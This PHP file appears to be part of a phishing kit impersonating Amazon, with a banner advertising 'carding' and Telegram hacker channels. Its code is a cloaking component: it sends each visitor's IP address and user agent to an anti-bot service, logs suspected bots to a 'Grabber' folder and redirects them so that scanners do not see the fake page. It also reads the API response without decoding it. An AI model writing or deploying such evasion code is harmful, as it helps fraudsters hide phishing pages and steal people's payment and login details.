<?php
/*
██████╗ ██╗  ██╗███████╗    ██████╗ ███████╗ ██████╗██╗  ██╗ █████╗ ██╗  ██╗     ██████╗ ██████╗ ██████╗ ███████╗██████╗ 
██╔══██╗██║  ██║██╔════╝    ██╔══██╗██╔════╝██╔════╝██║ ██╔╝██╔══██╗██║  ██║    ██╔════╝██╔═══██╗██╔══██╗██╔════╝██╔══██╗
██║  ██║███████║█████╗      ██████╔╝█████╗  ██║     █████╔╝ ███████║███████║    ██║     ██║   ██║██║  ██║█████╗  ██║  ██║
██║  ██║██╔══██║██╔══╝      ██╔══██╗██╔══╝  ██║     ██╔═██╗ ██╔══██║██╔══██║    ██║     ██║   ██║██║  ██║██╔══╝  ██║  ██║
██████╔╝██║  ██║███████╗    ██║  ██║███████╗╚██████╗██║  ██╗██║  ██║██║  ██║    ╚██████╗╚██████╔╝██████╔╝███████╗██████╔╝
╚═════╝ ╚═╝  ╚═╝╚══════╝    ╚═╝  ╚═╝╚══════╝ ╚═════╝╚═╝  ╚═╝╚═╝  ╚═╝╚═╝  ╚═╝     ╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚═════╝ 
 * (🧑‍💻)=>DHE RECKAH BOY BORN DEM<=(🧑‍💻)
 * (🧑‍💻)=>OR THEY DON'T TELL YOU <=(🧑‍💻)
 * (🧑‍💻)=>COMMON CARDING FOR DATOR<=(🧑‍💻)
 * Dhe Reckah Amazon Page (MultiFunc)
 * version 1.0.0
 * REMEMBER:                             
 * Facebook fan page is @DheReckahBoy
 * Twitter  fan page is @DheReckahBoy
 * Insta    fan page is @DheReckahBoy
 * youtube  fan page is @DheReckahBoy
 * Telegram fan page is @DheReckahBoy
 * Copycat all reserved @DheReckahBoys
#############################################
#$            Dhe Reckah Coded             #$
#$                  Says:                  #$ 
We All Know The Dangers Of The Internet Users
#$                    &                    #$
#$           As the Internet Exit          #$ 
#$           The dangers exit too          #$  
#############################################
 ================IF AGREED=================
 ==================THEN====================
=Contact Coder On Telegram @DheReckahCoded
=To Be save Join Our Telegram Group
=   @Dhe_ReckahsHackers_Generation
=To Be Secured Join Our Telegram Channel
=   @Dhe_Reckahs_Hackers_Generation

*/


error_reporting(0);
if($KillBot == "on") {
    $DheReckahRemoteIp = getIP();
    $DheRekahUserAgent = urlencode($_SERVER["HTTP_USER_AGENT"]);
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, ("https://killbot.org/api/v2/blocker?ip=" . $DheReckahRemoteIp . "&apikey=" . $kill_bot_api . "&ua=" . $DheRekahUserAgent . "&url=" . $_SERVER['REQUEST_URI']));
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_CUSTOMREQUEST, 'GET');
    curl_setopt($ch, CURLOPT_ENCODING, 'gzip, deflate');
    $answer = curl_exec($ch);
    curl_close($ch);
    $result = $answer;
    if($result->{'data'}->{'block_access'} == true) {
        $message = ("Dh3 R3ck4h D3cl!n3d =>  [ K!!ll B0t 4nt!B0t ] :".$_SERVER['HTTP_USER_AGENT']."\n !p: ".$DheReckahRemoteIp." || D4t3:".gmdate ("d M,Y")." T!m3:".gmdate ("g:i a")."\n\n");
        $save=fopen("DheReckahGrabber/DiscoveredBot.txt","a+");
        fwrite($save,$message);
        fclose($save);
        header("Location: ".redirectBot());exit();
    }
    elseif($result->{'data'}->{'is_bot'} == true) {
        $message = ("Dh3 R3ck4h D3cl!n3d =>  [ K!!ll B0t 4nt!B0t ] :".$_SERVER['HTTP_USER_AGENT']."\n !p: ".$DheReckahRemoteIp." || D4t3:".gmdate ("d M,Y")." T!m3:".gmdate ("g:i a")."\n\n");
        $save=fopen("DheReckahGrabber/DiscoveredBot.txt","a+");
        fwrite($save,$message);
        fclose($save);
        header("Location: ".redirectBot());exit();
    }
    
}

?>